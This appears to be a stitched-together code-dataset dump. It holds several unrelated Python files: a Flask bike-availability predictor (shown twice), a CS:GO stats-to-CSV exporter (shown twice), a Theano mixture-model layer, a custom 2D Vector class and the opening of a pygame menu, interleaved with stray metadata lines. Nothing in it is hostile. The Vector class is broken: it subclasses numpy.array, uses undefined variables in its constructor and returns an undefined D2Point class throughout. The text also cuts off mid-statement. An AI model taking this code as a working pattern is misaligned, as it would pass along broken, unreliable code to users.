sess.run(tf.global_variables_initializer())
pred = sess.run([out_layer], feed_dict={x: X})
pred_1 = pred[0][0][0]
from sklearn.ensemble import RandomForestRegressor
rf = pickle.load(open("./../weights/rf.p", "rb"))
pred_2 = rf.predict(X)[0]
pred = (pred_1+pred_2)/2
return "<br>".join(["Predicted Number of Bikes are: "+"{:.0f}".format(np.round((pred))),"Capacity at Station: "+str(cap)])
station
if __name__ == "__main__":
app.run(host= '0.0.0.0')
|
from flask import Flask, flash, redirect, render_template, request, session, abort
app = Flask(__name__)
@app.route("/")
def hello():
stat = []
with open('./stations.csv', 'r') as f:
temp = f.readlines()
for i in temp:
stat.append(i.strip().split(","))
return render_template('results.html',hours=list(range(24)),minutes=["{:02d}".format(i) for i in list(range(0,59,5))],stations=stat)
@app.route("/send",methods=['POST'])
def send():
form_vals = ["hour","minute","station"]
_,month,date = request.form["date_time"].split("-")
month=int(month)
date = int(date)
hour = int(request.form["hour"])
minute = int(request.form["minute"])
stat_id = int(request.form["station"])
stat = []
with open('./stations.csv', 'r') as f:
temp = f.readlines()
for i in temp:
stat.append(i.strip().split(","))
for i,j in enumerate(stat):
if(int(j[1])==stat_id):
cap = stat[i][2]
import tensorflow as tf
from tensorflow.python.framework import ops
import pickle
ops.reset_default_graph()
training_epochs = 1000
batch_size = 64
n_input = 6
n_classes = 1
n_hidden_1 = 6
n_hidden_2 = 2
weights = {
'h1': tf.Variable(pickle.load(open("./../weights/h1.p", "rb"))),
'h2': tf.Variable(pickle.load(open("./../weights/h2.p", "rb"))),
'out': tf.Variable(pickle.load(open("./../weights/hout.p", "rb")))
}
biases = {
'b1': tf.Variable(pickle.load(open("./../weights/b1.p", "rb"))),
'b2': tf.Variable(pickle.load(open("./../weights/b2.p", "rb"))),
'out': tf.Variable(pickle.load(open("./../weights/bout.p", "rb")))
}
#keep_prob = tf.placeholder("float")
x = tf.placeholder("float", [None, n_input])
y = tf.placeholder("float", [None, n_classes])
layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
layer_1 = tf.nn.sigmoid(layer_1)
layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
layer_2 = tf.nn.sigmoid(layer_2)
out_layer = tf.matmul(layer_2, weights['out']) + biases['out']
cost = tf.reduce_mean(tf.squared_difference(y,out_layer))
optimizer = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(cost)
import numpy as np
X = np.array([month,date,hour,minute,stat_id,cap]).reshape(-1,6)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
pred = sess.run([out_layer], feed_dict={x: X})
pred_1 = pred[0][0][0]
from sklearn.ensemble import RandomForestRegressor
rf = pickle.load(open("./../weights/rf.p", "rb"))
pred_2 = rf.predict(X)[0]
pred = (pred_1+pred_2)/2
return "<br>".join(["Predicted Number of Bikes are: "+"{:.0f}".format(np.round((pred))),"Capacity at Station: "+str(cap)])
station
if __name__ == "__main__":
app.run(host= '0.0.0.0')
|
en
| 0.344637
|
#keep_prob = tf.placeholder("float")
| 2.252235
| 2
|
csgoscraper/exportplayerstatstocsv.py
|
sexnine/csgo_matches_scraper
| 0
|
6628529
|
import pickle
from csgodataclasses.csgodataclasses import *
import yaml
import csv
config = None
def load_config():
print("Loading config")
with open("../config.yml", "r") as f:
global config
config = yaml.safe_load(f)
print("Loaded config!")
def write_csv(data, file_name):
with open("../csgodist/" + file_name, "w", encoding="utf8", newline="") as f:
fc = csv.DictWriter(f, fieldnames=data[0].keys())
fc.writeheader()
fc.writerows(data)
def get_my_data(matches):
my_data = []
for match in matches:
found = False
for team in match.teams:
if found:
break
for player in team.players:
print(player)
if found:
break
if player.name == config.get("my_username"):
print("a")
print(vars(player.stats))
my_data.append(vars(player.stats))
found = True
return my_data
def main():
load_config()
with open("../csgodist/comp.pkl", "rb") as f:
competitive_matches = pickle.load(f)
with open("../csgodist/wingman.pkl", "rb") as f:
wingman_matches = pickle.load(f)
with open("../csgodist/scrim.pkl", "rb") as f:
scrimmage_matches = pickle.load(f)
write_csv(get_my_data(competitive_matches), "comp.csv")
write_csv(get_my_data(wingman_matches), "wingman.csv")
write_csv(get_my_data(scrimmage_matches), "scrim.csv")
if __name__ == "__main__":
main()
|
import pickle
from csgodataclasses.csgodataclasses import *
import yaml
import csv
config = None
def load_config():
print("Loading config")
with open("../config.yml", "r") as f:
global config
config = yaml.safe_load(f)
print("Loaded config!")
def write_csv(data, file_name):
with open("../csgodist/" + file_name, "w", encoding="utf8", newline="") as f:
fc = csv.DictWriter(f, fieldnames=data[0].keys())
fc.writeheader()
fc.writerows(data)
def get_my_data(matches):
my_data = []
for match in matches:
found = False
for team in match.teams:
if found:
break
for player in team.players:
print(player)
if found:
break
if player.name == config.get("my_username"):
print("a")
print(vars(player.stats))
my_data.append(vars(player.stats))
found = True
return my_data
def main():
load_config()
with open("../csgodist/comp.pkl", "rb") as f:
competitive_matches = pickle.load(f)
with open("../csgodist/wingman.pkl", "rb") as f:
wingman_matches = pickle.load(f)
with open("../csgodist/scrim.pkl", "rb") as f:
scrimmage_matches = pickle.load(f)
write_csv(get_my_data(competitive_matches), "comp.csv")
write_csv(get_my_data(wingman_matches), "wingman.csv")
write_csv(get_my_data(scrimmage_matches), "scrim.csv")
if __name__ == "__main__":
main()
|
none
| 1
| 2.8621
| 3
|
|
classes/model/layermodels/mixturemodel_usl_theano_scan.py
|
dennisforster/NeSi
| 1
|
6628530
|
# Copyright (C) 2015, <NAME> <<EMAIL>>
#
# LICENSE: THE SOFTWARE IS PROVIDED "AS IS" UNDER THE
# ACADEMIC FREE LICENSE (AFL) v3.0.
#
import theano
import theano.tensor as T
import numpy as np
from _layermodels import LayerModel_Theano_Scan
from utils.decorators import DocInherit
doc_inherit = DocInherit
#------------------------------------------------------------------------------
class MixtureModel(LayerModel_Theano_Scan):
"""
"""
def __init__(self, nmultilayer, nlayer, input_source):
self.W_t = T.matrix("W_%d.%d"%(nmultilayer,nlayer), dtype='float32')
self.s_t = T.matrix("s_%d.%d"%(nmultilayer,nlayer), dtype='float32')
self.parameters_t = [
T.scalar("epsilon_%d.%d"%(nmultilayer,nlayer), dtype='float32'),]
self._nmultilayer = nmultilayer
self._nlayer = nlayer
self._input_source = input_source
# _input_source gives for each input variable which is not from
# this layer the multilayer and the Layer of its source:
# _input_source[i][0]: MultiLayer of variable i
# _input_source[i][1]: Layer of variable i
@doc_inherit
def sequences(self, mode='train'):
if (mode == 'train'):
sequences = []
elif (mode == 'test'):
sequences = []
elif (mode == 'likelihood'):
sequences = []
return sequences
@doc_inherit
def outputs_info(self, mode='train'):
if (mode == 'train'):
outputs_info = [self.W_t]
elif (mode == 'test'):
outputs_info = [self.s_t]
elif (mode == 'likelihood'):
outputs_info = []
return outputs_info
@doc_inherit
def non_sequences(self, mode='train'):
if (mode == 'train'):
non_sequences = self.parameters_t
elif (mode == 'test'):
non_sequences = [self.W_t]
elif (mode == 'likelihood'):
non_sequences = [self.W_t]
return non_sequences
@doc_inherit
def input_parameters(self, mode='train'):
if (mode == 'train'):
parameters = [
's_%d.%d[t]'%(self._input_source[0][0], self._input_source[0][1]),
'L[t]',
'W_%d.%d[t-1]'%(self._nmultilayer, self._nlayer),
'epsilon_%d.%d'%(self._nmultilayer, self._nlayer)
]
elif (mode == 'test'):
parameters = [
's_%d.%d[t]'%(self._input_source[0][0], self._input_source[0][1]),
'W_%d.%d'%(self._nmultilayer, self._nlayer)
]
return parameters
@doc_inherit
def learningstep(self, Y, L, W, epsilon):
s = self._activation(Y,L,W)
s.name = 's_%d.%d[t]'%(self._nmultilayer,self._nlayer)
W_new = W + epsilon*(T.tensordot(s,Y,axes=[0,0]) -
T.sum(s,axis=0)[:,np.newaxis]*W)
W_new.name = 'W_%d.%d[t]'%(self._nmultilayer,self._nlayer)
return s, W_new
@doc_inherit
def teststep(self, Y, W):
# activation
s = self._inference(Y,W)
s.name = 's_%d.%d[t]'%(self._nmultilayer,self._nlayer)
return s
@doc_inherit
def set_weights(self, W):
self.W = W
@doc_inherit
def get_weights(self):
return self.W
def _activation(self, Y, L, W):
"""Return the activation for a given input."""
s = T.ones((L.shape[0],W.shape[0]), dtype='float32')/T.cast(W.shape[0],'float32')
return s
def _inference(self, Y, W):
"""Return the infered class label for a given input"""
W_normalized = T.switch(T.eq(W,0), 0, W/T.sum(W, axis=0))
s = T.tensordot(Y, W_normalized, axes=[1,1])
return s
|
# Copyright (C) 2015, <NAME> <<EMAIL>>
#
# LICENSE: THE SOFTWARE IS PROVIDED "AS IS" UNDER THE
# ACADEMIC FREE LICENSE (AFL) v3.0.
#
import theano
import theano.tensor as T
import numpy as np
from _layermodels import LayerModel_Theano_Scan
from utils.decorators import DocInherit
doc_inherit = DocInherit
#------------------------------------------------------------------------------
class MixtureModel(LayerModel_Theano_Scan):
"""
"""
def __init__(self, nmultilayer, nlayer, input_source):
self.W_t = T.matrix("W_%d.%d"%(nmultilayer,nlayer), dtype='float32')
self.s_t = T.matrix("s_%d.%d"%(nmultilayer,nlayer), dtype='float32')
self.parameters_t = [
T.scalar("epsilon_%d.%d"%(nmultilayer,nlayer), dtype='float32'),]
self._nmultilayer = nmultilayer
self._nlayer = nlayer
self._input_source = input_source
# _input_source gives for each input variable which is not from
# this layer the multilayer and the Layer of its source:
# _input_source[i][0]: MultiLayer of variable i
# _input_source[i][1]: Layer of variable i
@doc_inherit
def sequences(self, mode='train'):
if (mode == 'train'):
sequences = []
elif (mode == 'test'):
sequences = []
elif (mode == 'likelihood'):
sequences = []
return sequences
@doc_inherit
def outputs_info(self, mode='train'):
if (mode == 'train'):
outputs_info = [self.W_t]
elif (mode == 'test'):
outputs_info = [self.s_t]
elif (mode == 'likelihood'):
outputs_info = []
return outputs_info
@doc_inherit
def non_sequences(self, mode='train'):
if (mode == 'train'):
non_sequences = self.parameters_t
elif (mode == 'test'):
non_sequences = [self.W_t]
elif (mode == 'likelihood'):
non_sequences = [self.W_t]
return non_sequences
@doc_inherit
def input_parameters(self, mode='train'):
if (mode == 'train'):
parameters = [
's_%d.%d[t]'%(self._input_source[0][0], self._input_source[0][1]),
'L[t]',
'W_%d.%d[t-1]'%(self._nmultilayer, self._nlayer),
'epsilon_%d.%d'%(self._nmultilayer, self._nlayer)
]
elif (mode == 'test'):
parameters = [
's_%d.%d[t]'%(self._input_source[0][0], self._input_source[0][1]),
'W_%d.%d'%(self._nmultilayer, self._nlayer)
]
return parameters
@doc_inherit
def learningstep(self, Y, L, W, epsilon):
s = self._activation(Y,L,W)
s.name = 's_%d.%d[t]'%(self._nmultilayer,self._nlayer)
W_new = W + epsilon*(T.tensordot(s,Y,axes=[0,0]) -
T.sum(s,axis=0)[:,np.newaxis]*W)
W_new.name = 'W_%d.%d[t]'%(self._nmultilayer,self._nlayer)
return s, W_new
@doc_inherit
def teststep(self, Y, W):
# activation
s = self._inference(Y,W)
s.name = 's_%d.%d[t]'%(self._nmultilayer,self._nlayer)
return s
@doc_inherit
def set_weights(self, W):
self.W = W
@doc_inherit
def get_weights(self):
return self.W
def _activation(self, Y, L, W):
"""Return the activation for a given input."""
s = T.ones((L.shape[0],W.shape[0]), dtype='float32')/T.cast(W.shape[0],'float32')
return s
def _inference(self, Y, W):
"""Return the infered class label for a given input"""
W_normalized = T.switch(T.eq(W,0), 0, W/T.sum(W, axis=0))
s = T.tensordot(Y, W_normalized, axes=[1,1])
return s
|
en
| 0.494298
|
# Copyright (C) 2015, <NAME> <<EMAIL>> # # LICENSE: THE SOFTWARE IS PROVIDED "AS IS" UNDER THE # ACADEMIC FREE LICENSE (AFL) v3.0. # #------------------------------------------------------------------------------ # _input_source gives for each input variable which is not from # this layer the multilayer and the Layer of its source: # _input_source[i][0]: MultiLayer of variable i # _input_source[i][1]: Layer of variable i # activation Return the activation for a given input. Return the infered class label for a given input
| 2.161551
| 2
|
WolfEyes/Utils/Vector.py
|
TBIproject/WolfEye
| 2
|
6628531
|
<reponame>TBIproject/WolfEye<filename>WolfEyes/Utils/Vector.py
# -*- coding: utf-8 -*-
"""Custom weird vector, very useful."""
import numpy
import math
__all__ = [
'Vector',
]
# Plus simple pour gérer les points/vecteurs 2d
class Vector(numpy.array):
"""Some custom vector"""
# Valeur d'arrondi extrême
ROUND = 14
# Init
def __init__(this, *args):
this.x = x
this.y = y
def __construct_one(): pass
# Getters/Setters
@property
def x(this): return round(this.__X, this.ROUND)
@property
def y(this): return round(this.__Y, this.ROUND)
@x.setter
def x(this, value):
r = this.__X = float(value)
return r
@y.setter
def y(this, value):
r = this.__Y = float(value)
return r
# ToString
def __str__(this):
return '(%s, %s)[%s]' % (this.x, this.y, abs(this))
def __repr__(this): return str(this)
# Addition
def __add__(this, p):
if isinstance(p, D2Point): return D2Point(this.x + p.x, this.y + p.y)
else: return D2Point(this.x + p, this.y + p)
# Soustraction
def __sub__(this, p):
if isinstance(p, D2Point): return D2Point(this.x - p.x, this.y - p.y)
else: return D2Point(this.x - p, this.y - p)
# Division
def __div__(this, r):
if isinstance(r, D2Point): return D2Point(this.x / r.x, this.y / r.y)
else: return D2Point(this.x / r, this.y / r)
# Multiplication
def __mul__(this, r):
if isinstance(r, D2Point): return D2Point(this.x * r.x, this.y * r.y)
else: return D2Point(this.x * r, this.y * r)
# Puissance
def __pow__(this, r):
if isinstance(r, D2Point): return D2Point(this.x ** r.x, this.y ** r.y)
else: return D2Point(this.x ** r, this.y ** r)
# Opposé
def __neg__(this): return D2Point(-this.x, -this.y)
def clone(this):
"""Returns a new vector with same coords as current"""
return D2Point(this.x, this.y)
# Clone (+D2Point)
def __pos__(this):
"""'+this' : clones itself"""
return this.clone()
# Taille du vecteur
@property
def length(this): return math.sqrt(this.x**2 + this.y**2)
# Module/Taille
def __abs__(this): return this.length
def __len__(this): return abs(this)
@length.setter
def length(this, m):
size = this.length
if size: # Si le vecteur n'est pas nul
this.x *= float(m) / size
this.y *= float(m) / size
return this
# Partie entière
@property
def int(this):
"""Returns new vector as current with integer coordinates"""
return D2Point(int(this.x), int(this.y))
def tuple(this):
"""Returns current as a tuple"""
return (this.x, this.y)
# Conversion en tuple (~D2Point)
def __invert__(this): return this.tuple
# Modulation/moyenne (a % b)
def __mod__(this, m):
if isinstance(m, D2Point): return (this + m) / 2.0
else: # Si c'est un réel
new = +this
new.length = m
return new
# Vecteur unitaire
@property
def unit(this):
"""Returns unitary vector from current"""
return this % 1
# Pente/Direction
@property
def slope(this):
"""Gets vector slope from direction"""
try: return this.y / this.x
except: return None
# Direction (angle)
@property
def direction(this):
"""Gets current vector direction (radians)"""
return math.atan(this.slope)
# Changement de direction
@direction.setter
def direction(this, rad):
"""Sets the current vector direction to 'rad' (radians)"""
length = this.length
dir = D2Point.createUnit(rad)
this.x = dir.x * length
this.y = dir.y * length
# Easy Degrees
@property
def directionDeg(this):
"""Gets current vector direction (degrees)"""
return math.degrees(this.direction)
# Création de vecteurs unitaires
@staticmethod
def createUnit(rad=0):
"""Static method returning some unit vector from a given direction 'rad' (radians)"""
return D2Point(math.cos(rad), math.sin(rad))
# Easy Degrees
@staticmethod
def createUnitDeg(deg=0):
"""Static method returning some unit vector from a given direction 'deg' (degrees)"""
return D2Point.createUnit(math.radians(deg))
# Rotation du vecteur
def rotate(this, rad):
"""Returns a new vector being the current rotated by 'rad' (radians)"""
z = complex(this.x, this.y)
u = D2Point.createUnit(rad)
c = complex(u.x, u.y)
new = z * c
return D2Point(new.real, new.imag)
# Easy Degrees
def rotateDeg(this, deg):
"""Returns a new vector being the current rotated by 'deg' (degrees)"""
return this.rotate(math.radians(deg))
# Réaction à "not this"
def __nonzero__(this): return True
|
# -*- coding: utf-8 -*-
"""Custom weird vector, very useful."""
import numpy
import math
__all__ = [
'Vector',
]
# Plus simple pour gérer les points/vecteurs 2d
class Vector(numpy.array):
"""Some custom vector"""
# Valeur d'arrondi extrême
ROUND = 14
# Init
def __init__(this, *args):
this.x = x
this.y = y
def __construct_one(): pass
# Getters/Setters
@property
def x(this): return round(this.__X, this.ROUND)
@property
def y(this): return round(this.__Y, this.ROUND)
@x.setter
def x(this, value):
r = this.__X = float(value)
return r
@y.setter
def y(this, value):
r = this.__Y = float(value)
return r
# ToString
def __str__(this):
return '(%s, %s)[%s]' % (this.x, this.y, abs(this))
def __repr__(this): return str(this)
# Addition
def __add__(this, p):
if isinstance(p, D2Point): return D2Point(this.x + p.x, this.y + p.y)
else: return D2Point(this.x + p, this.y + p)
# Soustraction
def __sub__(this, p):
if isinstance(p, D2Point): return D2Point(this.x - p.x, this.y - p.y)
else: return D2Point(this.x - p, this.y - p)
# Division
def __div__(this, r):
if isinstance(r, D2Point): return D2Point(this.x / r.x, this.y / r.y)
else: return D2Point(this.x / r, this.y / r)
# Multiplication
def __mul__(this, r):
if isinstance(r, D2Point): return D2Point(this.x * r.x, this.y * r.y)
else: return D2Point(this.x * r, this.y * r)
# Puissance
def __pow__(this, r):
if isinstance(r, D2Point): return D2Point(this.x ** r.x, this.y ** r.y)
else: return D2Point(this.x ** r, this.y ** r)
# Opposé
def __neg__(this): return D2Point(-this.x, -this.y)
def clone(this):
"""Returns a new vector with same coords as current"""
return D2Point(this.x, this.y)
# Clone (+D2Point)
def __pos__(this):
"""'+this' : clones itself"""
return this.clone()
# Taille du vecteur
@property
def length(this): return math.sqrt(this.x**2 + this.y**2)
# Module/Taille
def __abs__(this): return this.length
def __len__(this): return abs(this)
@length.setter
def length(this, m):
size = this.length
if size: # Si le vecteur n'est pas nul
this.x *= float(m) / size
this.y *= float(m) / size
return this
# Partie entière
@property
def int(this):
"""Returns new vector as current with integer coordinates"""
return D2Point(int(this.x), int(this.y))
def tuple(this):
"""Returns current as a tuple"""
return (this.x, this.y)
# Conversion en tuple (~D2Point)
def __invert__(this): return this.tuple
# Modulation/moyenne (a % b)
def __mod__(this, m):
if isinstance(m, D2Point): return (this + m) / 2.0
else: # Si c'est un réel
new = +this
new.length = m
return new
# Vecteur unitaire
@property
def unit(this):
"""Returns unitary vector from current"""
return this % 1
# Pente/Direction
@property
def slope(this):
"""Gets vector slope from direction"""
try: return this.y / this.x
except: return None
# Direction (angle)
@property
def direction(this):
"""Gets current vector direction (radians)"""
return math.atan(this.slope)
# Changement de direction
@direction.setter
def direction(this, rad):
"""Sets the current vector direction to 'rad' (radians)"""
length = this.length
dir = D2Point.createUnit(rad)
this.x = dir.x * length
this.y = dir.y * length
# Easy Degrees
@property
def directionDeg(this):
"""Gets current vector direction (degrees)"""
return math.degrees(this.direction)
# Création de vecteurs unitaires
@staticmethod
def createUnit(rad=0):
"""Static method returning some unit vector from a given direction 'rad' (radians)"""
return D2Point(math.cos(rad), math.sin(rad))
# Easy Degrees
@staticmethod
def createUnitDeg(deg=0):
"""Static method returning some unit vector from a given direction 'deg' (degrees)"""
return D2Point.createUnit(math.radians(deg))
# Rotation du vecteur
def rotate(this, rad):
"""Returns a new vector being the current rotated by 'rad' (radians)"""
z = complex(this.x, this.y)
u = D2Point.createUnit(rad)
c = complex(u.x, u.y)
new = z * c
return D2Point(new.real, new.imag)
# Easy Degrees
def rotateDeg(this, deg):
"""Returns a new vector being the current rotated by 'deg' (degrees)"""
return this.rotate(math.radians(deg))
# Réaction à "not this"
def __nonzero__(this): return True
|
en
| 0.480514
|
# -*- coding: utf-8 -*- Custom weird vector, very useful. # Plus simple pour gérer les points/vecteurs 2d Some custom vector # Valeur d'arrondi extrême # Init # Getters/Setters # ToString # Addition # Soustraction # Division # Multiplication # Puissance # Opposé Returns a new vector with same coords as current # Clone (+D2Point) '+this' : clones itself # Taille du vecteur # Module/Taille # Si le vecteur n'est pas nul # Partie entière Returns new vector as current with integer coordinates Returns current as a tuple # Conversion en tuple (~D2Point) # Modulation/moyenne (a % b) # Si c'est un réel # Vecteur unitaire Returns unitary vector from current # Pente/Direction Gets vector slope from direction # Direction (angle) Gets current vector direction (radians) # Changement de direction Sets the current vector direction to 'rad' (radians) # Easy Degrees Gets current vector direction (degrees) # Création de vecteurs unitaires Static method returning some unit vector from a given direction 'rad' (radians) # Easy Degrees Static method returning some unit vector from a given direction 'deg' (degrees) # Rotation du vecteur Returns a new vector being the current rotated by 'rad' (radians) # Easy Degrees Returns a new vector being the current rotated by 'deg' (degrees) # Réaction à "not this"
| 3.880875
| 4
|
reformat_gherkin/ast_node/_base.py
|
dcendents/reformat-gherkin
| 17
|
6628532
|
<reponame>dcendents/reformat-gherkin<filename>reformat_gherkin/ast_node/_base.py
from attr import dataclass
def prepare(cls=None, slots=True, frozen=True, eq=False):
"""
A common class decorator to decorate AST node classes. We can either use `@prepare`
with default parameters, or `@prepare(...)` to override the default values of the
parameters. By default, `eq=False` makes the objects hashable, and the hash is an
object's id. Therefore, every AST node is unique, even if they have identical
attributes (think of two identical rows or steps at two different places in a
document).
"""
wrapper = dataclass(slots=slots, frozen=frozen, eq=eq)
if cls is None:
return wrapper
return wrapper(cls)
|
from attr import dataclass
def prepare(cls=None, slots=True, frozen=True, eq=False):
"""
A common class decorator to decorate AST node classes. We can either use `@prepare`
with default parameters, or `@prepare(...)` to override the default values of the
parameters. By default, `eq=False` makes the objects hashable, and the hash is an
object's id. Therefore, every AST node is unique, even if they have identical
attributes (think of two identical rows or steps at two different places in a
document).
"""
wrapper = dataclass(slots=slots, frozen=frozen, eq=eq)
if cls is None:
return wrapper
return wrapper(cls)
|
en
| 0.764654
|
A common class decorator to decorate AST node classes. We can either use `@prepare` with default parameters, or `@prepare(...)` to override the default values of the parameters. By default, `eq=False` makes the objects hashable, and the hash is an object's id. Therefore, every AST node is unique, even if they have identical attributes (think of two identical rows or steps at two different places in a document).
| 3.159699
| 3
|
setup.py
|
airgproducts/euklid
| 0
|
6628533
|
#! /usr/bin/python
import logging
import os
import sys
import re
import platform
import subprocess
import multiprocessing
from distutils.version import LooseVersion
from distutils.core import setup
import setuptools
from setuptools.command.build_ext import build_ext
from setuptools.command.install_lib import install_lib
from setuptools.command.install import install
DEBUG = False
if "--debug" in sys.argv:
DEBUG = True
sys.argv.remove("--debug")
CONDA_BUILD = False
if "--conda" in sys.argv:
CONDA_BUILD = True
sys.argv.remove("--conda")
class CMakeExtension(setuptools.Extension):
def __init__(self, name, sourcedir=''):
super().__init__(name, [])
self.sourcedir = os.path.abspath(sourcedir)
#self.include_dirs = ['euklid-stubs']
class InstallStubs(install_lib):
def run(self):
super().run()
class CMakeBuild(build_ext):
def run(self):
print("extensions: ", self.extensions)
try:
out = subprocess.check_output(['cmake', '--version'])
except OSError:
raise RuntimeError("CMake must be installed to build the following extensions: " +
", ".join(e.name for e in self.extensions))
if platform.system() == "Windows":
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1))
if cmake_version < '3.1.0':
raise RuntimeError("CMake >= 3.1.0 is required on Windows")
for ext in self.extensions:
self.build_extension(ext)
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
num_cores = multiprocessing.cpu_count()
cmake_args = ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DPYTHON_EXECUTABLE=' + sys.executable]
cfg = 'Debug' if DEBUG else 'Release'
cmake_args.append(f"-DCMAKE_BUILD_TYPE={cfg}")
build_args = ['--config', cfg]
if CONDA_BUILD:
cmake_args += [
"-DWALL=off",
"-DUSE_SUBMODULE_LIBS=off",
"-DBUILD_SHARED_LIBS=ON"
'-G "Ninja"'
]
if platform.system() == "Windows":
cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(cfg.upper(), extdir)]
#if sys.maxsize > 2**32:
# cmake_args += ['-A', 'x64']
if not CONDA_BUILD:
build_args += ['--', f'-m:{num_cores}']
if CONDA_BUILD or platform.system() != "Windows":
cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]
build_args += ['--', f'-j{num_cores}']
env = os.environ.copy()
env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format(env.get('CXXFLAGS', ''),
self.distribution.get_version())
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
logging.info(f"Build dir: {self.build_temp}")
logging.info("Cmake args: " + " ".join(cmake_args))
logging.info("Build args: " + " ".join(build_args))
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp)
stubgen_path = self.build_lib
if not os.path.exists(self.build_lib):
stubgen_path = self.build_temp
try:
subprocess.check_call([sys.executable, 'stubs.py', stubgen_path])
except subprocess.CalledProcessError:
print("no mypy found")
version = "-"
with open("src/version.hpp") as version_file:
#print(version_file.read())
version = re.findall(r"version\s=\s['\"]([0-9\._]+)['\"]", version_file.read())[0]
with open("README.md") as readme_file:
long_description = readme_file.read()
setup(
name='euklid',
version=version,
description="common vector operations [2D/3D]",
ext_modules=[CMakeExtension('.')],
cmdclass={"build_ext": CMakeBuild, "install_lib": InstallStubs},
license='MIT',
long_description=long_description,
author='airgproducts',
url='http://github.com/airgproducts/euklid',
test_suite="tests.test_suite",
include_package_data=True
)
|
#! /usr/bin/python
import logging
import os
import sys
import re
import platform
import subprocess
import multiprocessing
from distutils.version import LooseVersion
from distutils.core import setup
import setuptools
from setuptools.command.build_ext import build_ext
from setuptools.command.install_lib import install_lib
from setuptools.command.install import install
DEBUG = False
if "--debug" in sys.argv:
DEBUG = True
sys.argv.remove("--debug")
CONDA_BUILD = False
if "--conda" in sys.argv:
CONDA_BUILD = True
sys.argv.remove("--conda")
class CMakeExtension(setuptools.Extension):
def __init__(self, name, sourcedir=''):
super().__init__(name, [])
self.sourcedir = os.path.abspath(sourcedir)
#self.include_dirs = ['euklid-stubs']
class InstallStubs(install_lib):
def run(self):
super().run()
class CMakeBuild(build_ext):
def run(self):
print("extensions: ", self.extensions)
try:
out = subprocess.check_output(['cmake', '--version'])
except OSError:
raise RuntimeError("CMake must be installed to build the following extensions: " +
", ".join(e.name for e in self.extensions))
if platform.system() == "Windows":
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1))
if cmake_version < '3.1.0':
raise RuntimeError("CMake >= 3.1.0 is required on Windows")
for ext in self.extensions:
self.build_extension(ext)
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
num_cores = multiprocessing.cpu_count()
cmake_args = ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DPYTHON_EXECUTABLE=' + sys.executable]
cfg = 'Debug' if DEBUG else 'Release'
cmake_args.append(f"-DCMAKE_BUILD_TYPE={cfg}")
build_args = ['--config', cfg]
if CONDA_BUILD:
cmake_args += [
"-DWALL=off",
"-DUSE_SUBMODULE_LIBS=off",
"-DBUILD_SHARED_LIBS=ON"
'-G "Ninja"'
]
if platform.system() == "Windows":
cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(cfg.upper(), extdir)]
#if sys.maxsize > 2**32:
# cmake_args += ['-A', 'x64']
if not CONDA_BUILD:
build_args += ['--', f'-m:{num_cores}']
if CONDA_BUILD or platform.system() != "Windows":
cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]
build_args += ['--', f'-j{num_cores}']
env = os.environ.copy()
env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format(env.get('CXXFLAGS', ''),
self.distribution.get_version())
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
logging.info(f"Build dir: {self.build_temp}")
logging.info("Cmake args: " + " ".join(cmake_args))
logging.info("Build args: " + " ".join(build_args))
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp)
stubgen_path = self.build_lib
if not os.path.exists(self.build_lib):
stubgen_path = self.build_temp
try:
subprocess.check_call([sys.executable, 'stubs.py', stubgen_path])
except subprocess.CalledProcessError:
print("no mypy found")
version = "-"
with open("src/version.hpp") as version_file:
#print(version_file.read())
version = re.findall(r"version\s=\s['\"]([0-9\._]+)['\"]", version_file.read())[0]
with open("README.md") as readme_file:
long_description = readme_file.read()
setup(
name='euklid',
version=version,
description="common vector operations [2D/3D]",
ext_modules=[CMakeExtension('.')],
cmdclass={"build_ext": CMakeBuild, "install_lib": InstallStubs},
license='MIT',
long_description=long_description,
author='airgproducts',
url='http://github.com/airgproducts/euklid',
test_suite="tests.test_suite",
include_package_data=True
)
|
en
| 0.23328
|
#! /usr/bin/python #self.include_dirs = ['euklid-stubs'] #if sys.maxsize > 2**32: # cmake_args += ['-A', 'x64'] #print(version_file.read())
| 1.862448
| 2
|
cat.pyw
|
ovvladimir/Animation
| 2
|
6628534
|
<reponame>ovvladimir/Animation
import pygame
import os
import sys
import random
import ast
from colors import COLOR
def load_images(path) -> list:
for file_name in os.listdir(path):
images_list.append(pygame.image.load(path + os.sep + file_name))
def mask():
for sp in collideGroup:
# collideColor = sp.image.get_at((30, 15))
sp.mask = pygame.mask.from_threshold(sp.image, collideColor, (1, 1, 1, 255))
class Menu(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.text_list = [
'space - somersault', 'm - menu', 'c - color selection',
'z - -transparency', 'x - +transparency',
'↓ - to lie', '↑ - jamp', '→ - go', '← - stop']
self.text_pos = [10, 0]
self.width_string = []
for string in self.text_list:
self.width_string.append(text.size(string)[0])
self.max_width_string = max(self.width_string)
self.max_height_string = text.get_height() + text.get_descent()
self.top = text.get_height() - text.get_ascent()
self.image = pygame.Surface((
self.text_pos[0] + self.max_width_string,
self.text_pos[1] + self.top + len(self.text_list) * self.max_height_string),
flags=pygame.SRCALPHA)
for txt in self.text_list:
self.text_render = text.render(txt, True, WHITE, None)
